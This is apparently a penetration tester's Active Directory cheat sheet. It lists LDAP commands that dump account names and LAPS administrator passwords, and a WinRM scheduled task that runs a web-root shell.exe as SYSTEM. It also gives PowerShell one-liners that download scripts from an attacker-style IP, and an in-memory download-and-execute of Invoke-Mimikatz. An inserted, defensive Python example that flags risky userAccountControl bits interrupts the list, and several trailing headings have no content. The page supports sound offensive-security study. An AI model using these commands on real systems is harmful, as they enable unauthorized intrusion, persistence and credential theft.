Quick Commands
LDAP Search
ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName:
ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

Run Command as User (winrm):
$pw = ConvertTo-SecureString "PASSWD" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("USER", $pw)
Invoke-Command -ComputerName COMPUTER -ScriptBlock { schtasks /create /sc onstart /tn shell /tr C:\inetpub\wwwroot\shell.exe /ru SYSTEM } -Credential $creds
Invoke-Command -ComputerName COMPUTER -ScriptBlock { schtasks /run /tn shell } -Credential $creds

Download file:
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://192.168.119.131/8888-198.ps1', '.\8888-198.ps1')"
powershell -exec bypass -c "iwr 'http://192.168.119.131/8888-198.ps1' -OutFile 8888.ps1"

Download & Execute in memory:
IEX((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'))

AD Users
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

Get Domain Machines / IPs
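The `-band 128` filter above tests a single userAccountControl bit (128 = password stored with reversible encryption). As an added example, not part of this cheat sheet, the Python below decodes every bit of an exported userAccountControl value and lists the accounts an auditor would review; the flag values are Microsoft's documented userAccountControl bits, the sample export is constructed.

```python
# Added example (not from the original cheat sheet): decode userAccountControl
# bitmasks and flag accounts whose bits weaken password or Kerberos protections.
# Flag values are Microsoft's documented userAccountControl bits.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",  # 128: reversible-encryption password storage
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}

# Bits worth flagging in an audit; each one relaxes a credential protection.
RISKY_BITS = {0x0020, 0x0080, 0x10000, 0x80000, 0x400000}


def decode_uac(value):
    """Return the names of all flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def risky_accounts(accounts):
    """Return (sAMAccountName, [risky flag names]) for each account with a risky bit.

    The page's 'userAccountControl -band 128' filter is the single-bit case of this;
    here every bit in RISKY_BITS is checked."""
    out = []
    for name, uac in accounts:
        hits = [UAC_FLAGS[b] for b in sorted(RISKY_BITS) if uac & b]
        if hits:
            out.append((name, hits))
    return out


# Constructed sample export: (sAMAccountName, userAccountControl)
SAMPLE = [
    ("alice", 0x200),                        # normal account, nothing risky
    ("svc_backup", 0x200 | 0x80 | 0x10000),  # reversible encryption + never expires
    ("legacy", 0x200 | 0x20),                # password not required
    ("bob", 0x200 | 0x400000),               # Kerberos pre-authentication disabled
    ("olduser", 0x202),                      # disabled normal account
]

if __name__ == "__main__":
    for name, flags in risky_accounts(SAMPLE):
        print(f"{name}: {', '.join(flags)}")
```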
Powershell Grep Table
Powershell Grep
Get user groups
Merge all csv to one
Get process using port